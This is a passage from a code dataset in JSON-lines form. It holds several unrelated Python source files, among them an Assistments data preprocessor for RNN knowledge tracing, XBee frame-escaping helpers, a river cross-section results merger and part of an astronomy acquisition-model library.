reset_env()\n\t\treturn next_observation(self.disp, self.WIDTH, self.HEIGHT)","sub_path":"environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"222800124","text":"# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. 
See License.txt in the project root for license information.\n# --------------------------------------------------------------------------------------------\n# Generated file, DO NOT EDIT\n# Changes may cause incorrect behavior and will be lost if the code is regenerated.\n# --------------------------------------------------------------------------------------------\n\nfrom msrest.serialization import Model\n\n\nclass WidgetSize(Model):\n \"\"\"WidgetSize.\n\n :param column_span: The Width of the widget, expressed in dashboard grid columns.\n :type column_span: int\n :param row_span: The height of the widget, expressed in dashboard grid rows.\n :type row_span: int\n \"\"\"\n\n _attribute_map = {\n 'column_span': {'key': 'columnSpan', 'type': 'int'},\n 'row_span': {'key': 'rowSpan', 'type': 'int'}\n }\n\n def __init__(self, column_span=None, row_span=None):\n super(WidgetSize, self).__init__()\n self.column_span = column_span\n self.row_span = row_span\n","sub_path":"vsts/vsts/dashboard/v4_1/models/widget_size.py","file_name":"widget_size.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"493666646","text":"\n# coding: utf-8\n\n# In[1]:\n\n\n# imports\nimport numpy as np\nimport pandas as pd\nimport _pickle as cPickle\nimport random\nfrom datetime import datetime\nfrom time import time\nimport csv\nfrom AssistmentsProperties import AssistmentsProperties\n\n\n# In[6]:\n\n\n# Assistments class for data preprocessing\nclass DataPreprocessor(object):\n def __init__(self, dataset_str, version):\n self.dataset = dataset_str\n self.version = version\n \n if ('Assistments' == dataset_str):\n self.attr = AssistmentsProperties(version)\n else:\n print('{} dataset not yet realized'.format(dataset_str))\n exit(1)\n \n # default data config\n self.config = {\n 'method': 'default',\n 'has_scaffolding': True,\n 'count_no_skill_id': True,\n 'has_test_mode': True,\n 'allow_multi_skills': True,\n 'window_length': 10,\n 'one_hot': True\n }\n \n def get_datapath(self, ext='csv', is_original=True, is_problem_contents=False, is_training=True):\n return self.attr.get_datapath(ext, is_original, self.config, is_problem_contents, is_training)\n \n def set_datapath(self, datapath):\n self.attr.set_datapath(datapath)\n \n # input: dataframe, split attribute, and split_rate\n # input should be injected after assigning idx\n # return a list\n # list[0] = (test_df, test_num_problems, test_num_steps)\n # list[1] = (train_df, train_num_problems, train_num_steps)\n # list[2] = max_num_skills\n def split_train_test(self, df, split_attr, sortby_attr, split_rate=0.1):\n if ('Assistments' == self.dataset):\n max_num_skills = __class__.get_nunique(df, self.attr.skill_id)\n \n __class__.sort(df, [split_attr, sortby_attr], [True, True])\n # split dataframes according to split_attr\n # note that groupby preserves the order of samples within groups (see documentation)\n groupby_obj = df.groupby(split_attr, sort=False)\n print('groupby done')\n \n # process before shuffling\n if ('default' == self.config['method']):\n pass\n elif ('sliding_window' == self.config['method']):\n window_length = self.config['window_length']\n groupby_obj = groupby_obj.apply(lambda x: None \n if len(x) < 10 \n else __class__.rolling_window(x.as_matrix(), window_length)).dropna()\n \n print('processed before shuffling')\n \n # shuffle\n group_list = list(groupby_obj)\n random.shuffle(group_list)\n print('shuffled')\n \n # number of elements for test df\n 
num_groups = int(len(group_list) * split_rate) + 1\n print('num_groups: ', num_groups)\n \n test_groups = group_list[:num_groups]\n train_groups = group_list[num_groups:]\n \n columns = df.columns.values\n \n test_dfs = self.groups_to_dflist(test_groups, columns)\n train_dfs = self.groups_to_dflist(train_groups, columns)\n print('dfs for testing and training created')\n\n if ('default' == self.config['method']):\n test_num_steps = np.max([len(rows) for rows in test_dfs])\n train_num_steps = np.max([len(rows) for rows in train_dfs])\n elif ('sliding_window' == self.config['method']):\n test_num_steps = train_num_steps = self.config['window_length']\n\n return [(test_dfs, test_num_steps),\n (train_dfs, train_num_steps),\n max_num_skills]\n else:\n print('{} dataset not yet realized'.format(self.dataset))\n exit(1)\n \n def groups_to_dflist(self, group_list, columns):\n if ('default' == self.config['method']):\n dfs = []\n for _, rows in group_list:\n dfs.append(rows)\n \n elif ('sliding_window' == self.config['method']):\n window_length = self.config['window_length']\n dfs = [pd.DataFrame(np.concatenate(group, axis=0), columns=columns) \n for group in group_list]\n dfs = [df.iloc[window_length * i:window_length * (i + 1), :] \n for df in dfs for i in range(len(df) // window_length)]\n \n else:\n print('{} method is not yet realized'.format(method))\n exit(1)\n \n return dfs\n \n # setup for preparing rnn\n def set_config(self, config):\n self.config.update(config)\n \n def get_attributes_for_df(self):\n attr_dict = {}\n if ('Assistments' == self.dataset):\n if ('2009' == self.version):\n attr_dict['split'] = self.attr.user_id\n attr_dict['time'] = self.attr.order_id\n attr_dict['correct'] = self.attr.correct\n attr_dict['skill_id'] = self.attr.skill_id\n\n # for data config\n attr_dict['scaffolding'] = self.attr.original\n attr_dict['tutor_mode'] = self.attr.tutor_mode\n attr_dict['allow_multi_skills'] = self.attr.order_id\n\n elif('2012' == self.version):\n attr_dict['split'] = self.attr.user_id\n attr_dict['time'] = self.attr.end_time\n attr_dict['correct'] = self.attr.correct\n attr_dict['skill_id'] = self.attr.skill_id\n \n # for data config\n attr_dict['scaffolding'] = self.attr.original\n attr_dict['tutor_mode'] = self.attr.tutor_mode\n \n # problem contents\n attr_dict['problem_content'] = self.attr.problem_content\n \n # TODO: how to represent multiple skills in 2012 dataset\n \n else:\n print('{} version not yet realized'.format(self.version))\n exit(1)\n else:\n print('{} dataset not yet realized'.format(self.dataset))\n \n return attr_dict\n \n # input\n # method: {default, moving_window}\n # max_num_steps: maximum number of steps\n # max_num_skills: maximum number of skills\n # students: list of tuples of 3 elements\n # students[i][0]: a list of length 1 with num_problems\n # students[i][1]: a list of skills\n # students[i][2]: a list of correctness\n # len(students[i][1]) == len(students[i][2]) == students[i][0][0]\n def prepare_rnn(self):\n # set proper attributes for df depending on dataset and version\n attr_dict = self.get_attributes_for_df()\n \n split_attr = attr_dict.get('split', None)\n time_attr = attr_dict.get('time', None)\n correct_attr = attr_dict.get('correct', None)\n skill_id_attr = attr_dict.get('skill_id', None)\n scaffolding_attr = attr_dict.get('scaffolding', None)\n tutor_mode_attr = attr_dict.get('tutor_mode', None)\n allow_multi_skill_attr = attr_dict.get('allow_multi_skills', None)\n \n if ('Assistments' == self.dataset):\n if ('2012' == self.version):\n 
problem_content_attr = attr_dict.get('problem_content', None)\n \n method = self.config['method']\n has_scaffolding = self.config['has_scaffolding']\n count_no_skill_id = self.config['count_no_skill_id']\n has_test_mode = self.config['has_test_mode']\n allow_multi_skills = self.config['allow_multi_skills']\n one_hot = self.config['one_hot']\n df = self.df.copy(deep=True)\n \n if (not has_scaffolding):\n if (None == scaffolding_attr):\n print('{} dataset {} version needs scaffolding_attr'.format(self.dataset, self.version))\n exit(1)\n df = df.loc[df.loc[:, scaffolding_attr].astype('int') == 1]\n if (not has_test_mode):\n if (None == tutor_mode_attr):\n print('{} dataset {} version needs tutor_mode_attr'.format(self.dataset, self.version))\n exit(1)\n df = df.loc[df.loc[:, tutor_mode_attr].astype('str') == 'tutor']\n if (not allow_multi_skills):\n if (None == allow_multi_skill_attr):\n print('{} dataset {} version needs allow_multi_skill_atr'.format(self.dataset, self.version))\n exit(1)\n else:\n if (one_hot):\n df.drop_duplicates(subset=[allow_multi_skill_attr], inplace=True)\n # if not one_hot? => make every correct data to tuples or list of correctness\n \n if (None == skill_id_attr):\n print('{} dataset {} version needs skill_id_attr'.format(self.dataset, self.version))\n exit(1)\n \n if (not count_no_skill_id):\n df = df.dropna(axis=0, subset=[skill_id_attr], how='any')\n else:\n df.loc[:, skill_id_attr].fillna(np.max(df.loc[:, skill_id_attr])+1, axis=0, inplace=True)\n \n if ('2009' == self.version):\n df = df.loc[:, [split_attr, skill_id_attr, correct_attr, time_attr]]\n elif ('2012' == self.version):\n df = df.loc[:, [split_attr, skill_id_attr, correct_attr, time_attr, problem_content_attr]]\n df.loc[:, problem_content_attr].fillna('', axis=0, inplace=True)\n \n # TODO\n if (not one_hot and '2009' == self.version):\n # make tuples for correct\n #df.loc[:, correct_attr] = df.loc[:, correct_attr].astype('str')\n pass\n \n # use original correct values from 0 ~ 1\n # if ('2012' == self.version):\n # __class__.process_correct_attr(df=df, correct_attr=correct_attr)\n # else:\n # __class__.assign_idx_to_column_values(df, correct_attr)\n\n __class__.assign_idx_to_column_values(df, split_attr)\n __class__.assign_idx_to_column_values(df, skill_id_attr)\n\n train_test_num_skill_list = self.split_train_test(df, split_attr=split_attr,\n sortby_attr=time_attr, split_rate=0.1)\n \n test_dfs = train_test_num_skill_list[0][0]\n test_num_steps = train_test_num_skill_list[0][1]\n\n train_dfs = train_test_num_skill_list[1][0]\n train_num_steps = train_test_num_skill_list[1][1]\n\n num_skills = train_test_num_skill_list[2]\n \n print('convert dfs to rnn inputs')\n # convert list of dataframes to rnn input\n if ('2012' == self.version):\n test_students = [([len(rows)], \n rows[skill_id_attr].values.tolist(),\n rows[correct_attr].values.tolist(), \n rows[problem_content_attr].values.tolist()) \n for rows in test_dfs]\n\n train_students = [([len(rows)], \n rows[skill_id_attr].values.tolist(), \n rows[correct_attr].values.tolist(), \n rows[problem_content_attr].values.tolist()) \n for rows in train_dfs]\n \n elif ('2009' == self.version or '2015' == self.version):\n test_students = [([len(rows)], \n rows[skill_id_attr].values.tolist(), \n rows[correct_attr].values.tolist()) \n for rows in test_dfs]\n\n train_students = [([len(rows)], \n rows[skill_id_attr].values.tolist(), \n rows[correct_attr].values.tolist()) \n for rows in train_dfs]\n\n self.test_rnn_data = (test_students, test_num_steps, 
num_skills)\n self.train_rnn_data = (train_students, train_num_steps, num_skills)\n print('conversion done')\n\n else:\n print('{} dataset not yet realized'.format(self.dataset))\n \n def get_save_path(self, ext='csv', is_problem_contents=False):\n process_config = self.config\n \n test_save_path = self.get_datapath(ext=ext, \n is_original=False, \n is_problem_contents=is_problem_contents,\n is_training=False)\n train_save_path = self.get_datapath(ext=ext,\n is_original=False, \n is_problem_contents=is_problem_contents,\n is_training=True)\n\n return test_save_path, train_save_path\n \n # ext: extension - csv, etc.\n def save(self, ext='csv', is_problem_contents=False):\n _ext = {\n 'csv': 'csv',\n 'pkl': 'pkl'\n }.get(ext, None)\n \n if (None == ext):\n print('{} extension not yet realized'.format(ext))\n exit(1)\n \n test_save_path, train_save_path = self.get_save_path(ext, is_problem_contents=is_problem_contents)\n test_rnn_data = self.test_rnn_data\n train_rnn_data = self.train_rnn_data\n if ('csv' == ext):\n __class__.save_rnn_data_as_csv(test_rnn_data, test_save_path)\n __class__.save_rnn_data_as_csv(train_rnn_data, train_save_path)\n \n elif ('pkl' == ext):\n __class__.save_rnn_data_as_pkl(test_rnn_data, test_save_path)\n __class__.save_rnn_data_as_pkl(train_rnn_data, train_save_path)\n \n # for 2009 version ...\n # self.config should include\n # 1. method: default or moving_windows\n # 2. has_scaffolding: True/False; include scaffolding problems or not; indicated by 'original' column\n # 3. count_no_skill_id: True/False; include interactions with no skill id or not\n # 4. has_test_mode: True/False; include test mode or not\n # 5. allow_multi_skills: True/False; whehter to allow multi skill or not\n # 6. window_length: if method is sliding_window, window_length should be provided. 
if not, default to 10\n def generate_rnn_data(self, save=False, ext='csv', is_problem_contents=False, encoding='iso-8859-1'):\n if ('Assistments' == self.dataset):\n assert self.config != None, 'please set config first'\n assert self.config['method'] != None, 'method is none'\n assert type(self.config['has_scaffolding']) == bool, 'has_scaffolding is not boolean'\n assert type(self.config['count_no_skill_id']) == bool, 'count_no_skill_id is not boolean'\n assert type(self.config['has_test_mode']) == bool, 'has_test_mode is not boolean'\n assert type(self.config['allow_multi_skills']) == bool, 'allow_multi_skills is not boolean'\n \n if ('df' not in self.__dict__):\n self.df = __class__.read_data_from_csv(self.get_datapath(ext='csv', \n is_original=True, \n is_problem_contents=False, \n is_training=True), \n encoding)\n if ('2012' == self.version):\n problem_contents = __class__.read_data_from_csv(self.get_datapath(ext='csv', \n is_original=True, \n is_problem_contents=True, \n is_training=True),\n encoding)\n self.df = self.df.join(problem_contents.set_index(self.attr.problem_id), \n on=self.attr.problem_id, how = 'outer')\n \n self.prepare_rnn()\n \n if (type(ext) == list and save):\n for e in ext:\n self.save(e)\n \n elif (save):\n self.save(ext)\n\n return (self.test_rnn_data, self.train_rnn_data)\n else:\n print('{} dataset not yet realized'.format(self.dataset))\n \n def load_rnn_data(self, is_training, ext='pkl', is_problem_contents=False):\n _ext = {\n 'pkl': 'pkl'\n }.get(ext, None)\n \n if (None == _ext):\n print('{} extension is not yet realized'.format(ext))\n exit(1)\n \n datapath = self.get_datapath(ext=ext, \n is_original=False, \n is_problem_contents=is_problem_contents, \n is_training=is_training)\n \n if ('pkl' == ext):\n obj = __class__.load_rnn_data_from_pkl(datapath)\n \n return obj\n # attr_list: list of args for sorting from higher priorities\n \n @staticmethod\n def sort(df, attr_list, is_ascending_list=[True], inplace=True):\n assert type(attr_list) == list, 'attr_list is not a list'\n assert type(is_ascending_list) == list, 'is_ascending_list is not a list'\n assert len(attr_list) == len(is_ascending_list), 'len of attr_list and is_ascending_list are not the same'\n assert type(inplace) == bool, 'inplace is not a boolean'\n \n result = df.sort_values(attr_list, ascending=is_ascending_list, inplace=inplace)\n \n if (inplace):\n return df\n else:\n return result\n \n @staticmethod\n def get_nunique(df, attr, dropna=True):\n return df.loc[:, attr].nunique(dropna=dropna)\n \n @staticmethod\n def assign_idx_to_column_values(df, attr):\n df.loc[:, attr] = pd.Categorical(df.loc[:, attr]).codes\n \n @staticmethod\n def read_data_from_csv(datapath, encoding):\n return pd.read_csv(datapath, encoding=encoding)\n \n # 2d to 3d\n # result[i]: i-th sliding window 2d numpy array\n @staticmethod\n def rolling_window(a, window):\n shape = (a.shape[0]-window+1, window, a.shape[-1])\n strides = (a.strides[0],) + a.strides\n return np.lib.stride_tricks.as_strided(a, shape=shape, strides=strides)\n \n # for assistments 2012 dataset, correct values can be floating point between 0 and 1 for essay questions\n # for convenience for now, if it is greater than or equal to 0.5, then it is processed as correct\n # see \"https://sites.google.com/site/assistmentsdata/how-to-interpret\"\n @staticmethod\n def process_correct_attr(df, correct_attr):\n df.loc[df.loc[:, correct_attr] > 0.5].loc[:, correct_attr] = 1\n df.loc[:, correct_attr] = df.loc[:, correct_attr] // 1\n \n @staticmethod\n def 
save_rnn_data_as_csv(rnn_data, save_path):\n # rnn_students include all the information including num_steps and num_skills\n # just save rnn_students\n with open(save_path, 'w', newline='') as f:\n students = rnn_data[0]\n writer = csv.writer(f, delimiter=',', quoting=csv.QUOTE_NONNUMERIC)\n \n for student in students:\n row = []\n for i in student:\n row.append(i)\n\n writer.writerows(row)\n \n @staticmethod\n def save_rnn_data_as_pkl(rnn_data, save_path):\n obj = {\n 'students': rnn_data[0], \n 'num_steps': rnn_data[1], \n 'num_skills': rnn_data[2]\n }\n \n if (len(rnn_data) > 3):\n obj['problem_contents'] = rnn_data[3]\n \n with open(save_path, 'wb') as output_file:\n cPickle.dump(file=output_file, obj=obj)\n \n @staticmethod\n def load_rnn_data_from_pkl(pklpath):\n with open(pklpath, 'rb') as input_file:\n obj = cPickle.load(input_file)\n \n return obj\n \n @staticmethod\n def make_data_config(method='default', \n has_scaffolding=True, \n count_no_skill_id=True, \n has_test_mode=True, \n allow_multi_skills=True, \n window_length=10, one_hot=True):\n config = {\n 'method': method, \n 'has_scaffolding': has_scaffolding,\n 'count_no_skill_id': count_no_skill_id, \n 'has_test_mode': has_test_mode,\n 'allow_multi_skills': allow_multi_skills,\n 'one_hot': one_hot,\n 'window_length': window_length\n }\n \n return config","sub_path":"codes/DataPreprocessor.py","file_name":"DataPreprocessor.py","file_ext":"py","file_size_in_byte":21301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"300130404","text":"# 1~100 임의 숫자를 맞추시오\n\nimport random\nguess_number = random.randint(1, 100)\nprint(guess_number)\n\nprint(\"숫자를 맞춰보세요.\")\nuser_input = int(input(\"숫자를 입력하세요.\"))\nwhile (user_input is not guess_number):\n if user_input > guess_number:\n print(\"숫자가 너무 큽니다.\")\n else:\n print(\"숫자가 너무 작습니다.\")\n user_input = int(input())\nelse:\n print(\"정답입니다.\", user_input, \"입니다.\")","sub_path":"Python/Basic/ch4/random_test.py","file_name":"random_test.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"645714872","text":"from xbee import python2to3\n\ndef byteframe(byt):\n \"\"\"\n Automate setting frame length (byte number 3)\n and checksum (final byte)\n \"\"\"\n o = bytearray(b'\\x7E\\x00')\n o.append(len(byt))\n o.extend(byt)\n o.append(0xFF - (sum(map(python2to3.byteToInt, byt)) & 0xFF))\n return bytes(_escape(o))\n\ndef _escape(msg):\n \"\"\"\n escape any reserved characters in frame\n \"\"\"\n reserved = set((0x7E, 0x7D, 0x11, 0x13))\n def escaped_byte(byte):\n if byte in reserved:\n yield 0x7D\n yield byte^0x20\n else:\n yield byte\n escaped = bytearray([msg[0]])\n escaped.extend(escaped for byte in msg[1:] for escaped in escaped_byte(byte))\n\n return escaped\n","sub_path":"breadcrumbs/tests/frameutil.py","file_name":"frameutil.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"223936331","text":"###############################################################################################################################\n#\n# created by Russell-MDAP team March-September 2021\n# 05_HydXS_attachModelResults.py\n#\n# attaches the derived results from HydXS_output.py to the whole original XS dataset\n# single function: attach_HydXS\n#\n# INPUT: XS dataset from pre_processing + dataframe from HydXS_output.py (BankFull + BankLeft + BankRight + 
CountBankFull)\n# DOES: uses output from runs, and determines if each datapoint is under/above Bankfull (inRiver = True/False)\n# OUTPUT: dataframe = pre-processed XS data + InRiver + BankFull + BankLeft + BankRight + CountBankFull\n# where inRiver = True / False ; using Distance and BankLeft and BankRight\n#\n# example: XSdata4 = attach_HydXS( XSdata2, XSdata3_out )\n#\n###############################################################################################################################\n\nimport pandas as pd\n\ndef attach_HydXS ( xs , results ) :\n \n for i in range(1,max(xs[\"x_sec_id\"])+1):\n print(i)\n subset = xs[xs[\"x_sec_id\"] == i].reset_index()\n \n #initialise\n left = None\n right = None\n bankfull = None\n count = None\n #from HydXS results\n if not len(results[results[\"CrossSection\"]==i])==0 :\n left = float(results[\"LeftOutput\"][results[\"CrossSection\"]==i])\n right = float(results[\"RightOutput\"][results[\"CrossSection\"]==i])\n bankfull = float(results[\"BankFullOutput\"][results[\"CrossSection\"]==i])\n count = int(results[\"CountatBankFull\"][results[\"CrossSection\"]==i])\n\n #initialise\n subset[\"InRiver\"] = False\n subset[\"BankFull\"] = bankfull \n subset[\"BankLeft\"] = left \n subset[\"BankRight\"] = right \n subset[\"CountAtBankFull\"] = count\n #set true if between left and right boundaries\n for j in range(0,len(subset)):\n if not (left==None or right==None): \n if subset.loc[j,\"Distance\"] > left and subset.loc[j,\"Distance\"] < right:\n subset.loc[j,\"InRiver\"] = True\n else:\n subset[\"CountAtBankFull\"] = 0\n \n if i == 1 :\n output = subset\n else:\n output = output.append(subset,ignore_index=True)\n return output\n\n#end attach_HydXS","sub_path":"HydXS/HydXS_attachModelResults.py","file_name":"HydXS_attachModelResults.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"243907319","text":"from Port import isExist\nimport subprocess\n\ncmd = None\nif not isExist(11211):\n cmd = \"D:/memcached.exe\"\nif not isExist(7000):\n c = \"D:/pdlib-resin-3.0.14/httpd -Xmn256m -Xms512m -Xmx1024m -Xdebug -Xnoagent -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=8001 -conf conf/resin-product.conf\"\n if cmd == None:\n cmd = c\n else:\n cmd += \" & \"+c\n\nif cmd != None:\n proc = subprocess.Popen(cmd, shell=True)\n","sub_path":"Front.py","file_name":"Front.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"365028290","text":"# Copyrights 2010-2011 Pierre Chanial\n# All rights reserved\n#\ntry:\n import fftw3\nexcept:\n print('Warning: Library PyFFTW3 is not installed.')\n\nimport copy\nimport gc\nimport multiprocessing\nimport numpy as np\nimport scipy.signal\nimport scipy.sparse.linalg\nimport tamasisfortran as tmf\n\nfrom mpi4py import MPI\nfrom scipy.sparse.linalg.interface import LinearOperator\nfrom . 
import var\nfrom .datatypes import Map, Tod, combine_sliced_shape, flatten_sliced_shape, \\\n validate_sliced_shape\nfrom .numpyutils import _my_isscalar\nfrom .processing import interpolate_linear\nfrom .quantity import Quantity, UnitError, _divide_unit, _multiply_unit\nfrom .utils import diff, diffT, diffTdiff, shift\nfrom .mpiutils import split_shape, split_work\n\n__all__ = [\n 'AcquisitionModel',\n 'AcquisitionModelLinear',\n 'DistributionGlobal',\n 'DistributionLocal',\n 'CircularShift',\n 'Clip',\n 'CompressionAverage',\n 'Convolution',\n 'DdTdd',\n 'Diagonal',\n 'DiscreteDifference',\n 'DownSampling',\n 'Fft',\n 'FftHalfComplex',\n 'Identity',\n 'InterpolationLinear',\n 'InvNtt',\n 'Masking',\n 'Maximum',\n 'Minimum',\n 'Offset',\n 'Packing',\n 'Padding',\n 'Projection',\n 'Reshaping',\n 'ResponseTruncatedExponential',\n 'Rounding',\n 'Scalar',\n 'Shift',\n 'SqrtInvNtt',\n 'Unpacking',\n 'acquisitionmodel_factory',\n 'asacquisitionmodel',\n]\n\n\nclass ValidationError(Exception): pass\n\nclass AcquisitionModel(object):\n \"\"\"Abstract class representing an instrument acquisition model.\n\n The response y from an input signal x by an acquisition model M is given by\n y = M.direct(x) or y = M(x)\n where x and y can be multidimensional numpy.ndarray.\n An acquisition model can be the combination of several submodels\n describing various parts of the instrumental chain:\n M = M3 * M2 * M1 ...\n\n The direct method must not rely on input attributes (except Tod's nsamples\n if the acquisition model is unconstrained) since this method is supposed to\n work on bare ndarrays (in which case the acquisition model must be\n constrained: nsamples is extracted from the shapein property). Attribute\n handling must be dealt with in the AcquisitionModel's __init__ method via\n the attrin and attrout keywords.\n \"\"\"\n\n def __init__(self, direct=None, cache=False, dtype=None, description=None,\n attrin=None, attrout=None, shapein=None, shapeout=None, \n typein=None, typeout=None, unitin=None, unitout=None):\n\n if direct is not None:\n if not hasattr(direct, '__call__'):\n raise TypeError('The input direct method is not callable.')\n self.direct = direct\n self.dtype = dtype\n if description is None:\n description = self.__class__.__name__\n self.description = description\n self.attrin = {} if attrin is None else attrin\n self.attrout = attrout or self.attrin\n shapein = validate_sliced_shape(shapein)\n self.shapein = shapein\n shapeout = validate_sliced_shape(shapeout or shapein)\n self.shapeout = shapeout\n self.typein = typein\n self.typeout = typeout or typein\n self.unitin = Quantity(1., unitin )._unit\n self.unitout = Quantity(1., unitout or unitin)._unit\n\n self.cache = cache\n \n if isinstance(self, AcquisitionModelTranspose):\n return\n\n if cache:\n # store the input of the direct model. Its memory allocation\n # is re-used as the output of the transpose model\n self.cachein = None\n # store the input of the transpose model. 
Its memory allocation\n # is re-used as the output of the direct model\n self.cacheout = None\n else:\n if typein != (typeout or typein):\n raise ValueError('Inplace handling requires same input and ou' \\\n 'tput type (' + str(typein) + ',' + \\\n str(typeout or typein) + ').')\n if self.attrin != self.attrout:\n raise ValueError('Inplace handling requires same input and ou' \\\n 'tput attributes.')\n\n if shapein and type(shapein[-1]) is tuple:\n if not issubclass(typein, Tod):\n raise TypeError('The input type should be a Tod.')\n if shapeout and type(shapeout[-1]) is tuple:\n if not issubclass(typeout or typein, Tod):\n raise TypeError('The output type should be a Tod.')\n\n def __call__(self, input, inplace=False, cachein=False, cacheout=False):\n return self.direct(input, inplace, cachein, cacheout)\n\n def direct(self, input, inplace, cachein, cacheout):\n raise NotImplementedError()\n\n @property\n def shape(self):\n shape = (np.product(flatten_sliced_shape(self.shapeout)),\n np.product(flatten_sliced_shape(self.shapein)))\n if shape[0] is None or shape[1] is None:\n return None\n return shape\n\n @property\n def dtype(self):\n if self._dtype is not None:\n return self._dtype\n return var.FLOAT_DTYPE\n\n @dtype.setter\n def dtype(self, dtype):\n self._dtype = np.dtype(dtype)\n \n def validate_shapein(self, shapein):\n \"\"\"\n Validate input shape and return the output shape of the direct model\n \"\"\"\n selfshapein = self.shapein\n if shapein is None or shapein == selfshapein:\n return self.shapeout\n if selfshapein is None:\n return shapein\n if flatten_sliced_shape(shapein) == flatten_sliced_shape(selfshapein):\n return self.shapeout\n raise ValidationError('The input of ' + self.description + ' has an i' \\\n 'ncompatible shape ' + str(shapein) + '. Expected shape is ' + \\\n str(self.shapein) + '.')\n\n def validate_shapeout(self, shapeout):\n \"\"\"\n Validate input shape and return the output shape of the transpose model\n \"\"\"\n selfshapeout = self.shapeout\n if shapeout is None or shapeout == selfshapeout:\n return self.shapein\n if selfshapeout is None:\n return shapeout\n if flatten_sliced_shape(shapeout) == flatten_sliced_shape(selfshapeout):\n return self.shapein\n raise ValidationError(\"The input of '\" + self.description + \".T' has \" \\\n 'an incompatible shape ' + str(shapeout) + '. 
Expected shape is ' +\\\n str(self.shapeout) + '.')\n\n def validate_input_inplace(self, input, inplace):\n\n input = np.asanyarray(input)\n try:\n input = np.asanyarray(input, _get_dtype(self.dtype, input.dtype))\n except:\n raise TypeError(\"The input of '\" + self.description + \\\n \"' has a non-numeric type.\")\n\n shape = self.validate_shapein(validate_sliced_shape(input.shape, \n getattr(input, 'nsamples', None) or (self.shapein[-1] \\\n if self.shapein and type(self.shapein[-1]) is tuple else None)))\n if shape is None:\n raise ValidationError('The shape of the output of ' + \\\n self.description+' is not known.')\n\n typein = self.typein\n if shape and type(shape[-1]) is tuple and (typein is None or \\\n not issubclass(typein, Tod)):\n typein = Tod\n if typein is not None and not isinstance(input, typein):\n input = input.view(typein)\n if shape and type(shape[-1]) is tuple:\n input.nsamples = shape[-1]\n\n if not inplace:\n if var.verbose:\n print('Info: Allocating ' + input.dtype.type.__name__ + \\\n str(input.shape).replace(' ','') + ' = ' + \\\n str(input.dtype.itemsize * input.size / 2.**20) + \\\n ' MiB in ' + self.description + '.')\n try:\n input = input.copy()\n except MemoryError:\n gc.collect()\n input = input.copy()\n\n for k,v in self.attrin:\n setattr(input, k, v)\n\n return input\n\n def validate_input_direct(self, input, cachein, cacheout):\n\n def set_cachein(cache):\n self.cachein = cache\n def set_cacheout(cache):\n self.cacheout = cache\n\n return self.validate_input_cache(input, self.description,\n cachein, cacheout,\n self.attrin, self.attrout,\n self.cachein, self.cacheout,\n set_cachein, set_cacheout,\n self.shapein, self.shapeout,\n self.typein, self.typeout,\n self.unitin, self.unitout,\n lambda shape: self.validate_shapein(shape))\n\n def validate_input_transpose(self, input, cachein, cacheout):\n\n def set_cachein(cache):\n self.cachein = cache\n def set_cacheout(cache):\n self.cacheout = cache\n\n return self.validate_input_cache(input, self.description + '.T',\n cachein, cacheout,\n self.attrout, self.attrin,\n self.cacheout, self.cachein,\n set_cacheout, set_cachein,\n self.shapeout, self.shapein,\n self.typeout, self.typein,\n self.unitout, self.unitin,\n lambda shape: self.validate_shapeout(shape))\n\n def validate_input_cache(self, input, description,\n do_cachein, do_cacheout,\n attrin, attrout,\n cachein, cacheout,\n set_cachein, set_cacheout,\n shapein, shapeout,\n typein, typeout,\n unitin, unitout,\n validate_input_shape):\n\n input = np.array(input, ndmin=1, subok=True, copy=False)\n try:\n input = np.asanyarray(input, _get_dtype(self.dtype, input.dtype))\n except:\n raise TypeError(\"The input of '\" + description + \"' has a non-num\" \\\n 'eric type.')\n\n shapein = validate_sliced_shape(input.shape, getattr(input, 'nsamples',\\\n None) or (shapein[-1] if shapein and type(shapein[-1]) is tuple \\\n else None))\n shapeout = validate_input_shape(shapein)\n\n if type(shapein[-1]) is tuple and (typein is None or \\\n not issubclass(typein, Tod)):\n typein = Tod\n if typein is not None and not isinstance(input, typein):\n input = input.view(typein)\n if shapein and type(shapein[-1]) is tuple:\n input.nsamples = shapein[-1]\n\n if do_cachein and id(input) != id(cachein):\n # validate input before storing it (nsamples is not enforced)\n _validate_input_unit(input, unitin)\n for k,v in attrin.items():\n setattr(input, k, v)\n \n # store it\n set_cachein(input)\n\n # get output from the cache\n shapeout_flat = flatten_sliced_shape(shapeout)\n if 
do_cacheout and cacheout is not None and \\\n shapeout_flat == cacheout.shape and cacheout.dtype == input.dtype:\n output = cacheout\n\n else:\n\n # allocate output\n if var.verbose:\n reason = 'cache not requested' if not do_cacheout else \\\n 'empty cache' if cacheout is None else \\\n 'type mismatch' if cacheout.dtype != input.dtype else \\\n 'shape mismatch'\n print('Info: Allocating ' + self.dtype.type.__name__ + \\\n str(shapeout_flat).replace(' ','') + ' = ' + \\\n str(input.dtype.itemsize * np.product(shapeout_flat) \\\n / 2.**20) + ' MiB in ' + description + ' (' + reason + \\\n ').')\n if typeout is None:\n typeout = input.__class__\n if type(shapeout[-1]) is tuple and not issubclass(typeout, Tod):\n typeout = Tod\n if hasattr(typeout, 'empty'):\n try:\n output = typeout.empty(shapeout, dtype=self.dtype)\n except MemoryError:\n gc.collect()\n output = typeout.empty(shapeout, dtype=self.dtype)\n else:\n try:\n output = np.empty(shapeout_flat, self.dtype)\n except MemoryError:\n gc.collect()\n output = np.empty(shapeout_flat, self.dtype)\n\n # store output\n if do_cacheout:\n set_cacheout(output)\n\n if type(shapeout[-1]) is tuple:\n output = Tod(output, nsamples=shapeout[-1], copy=False)\n\n _propagate_attributes(input, output, unitin, unitout, attrout)\n\n return input, output\n\n def __mul__(self, other):\n if 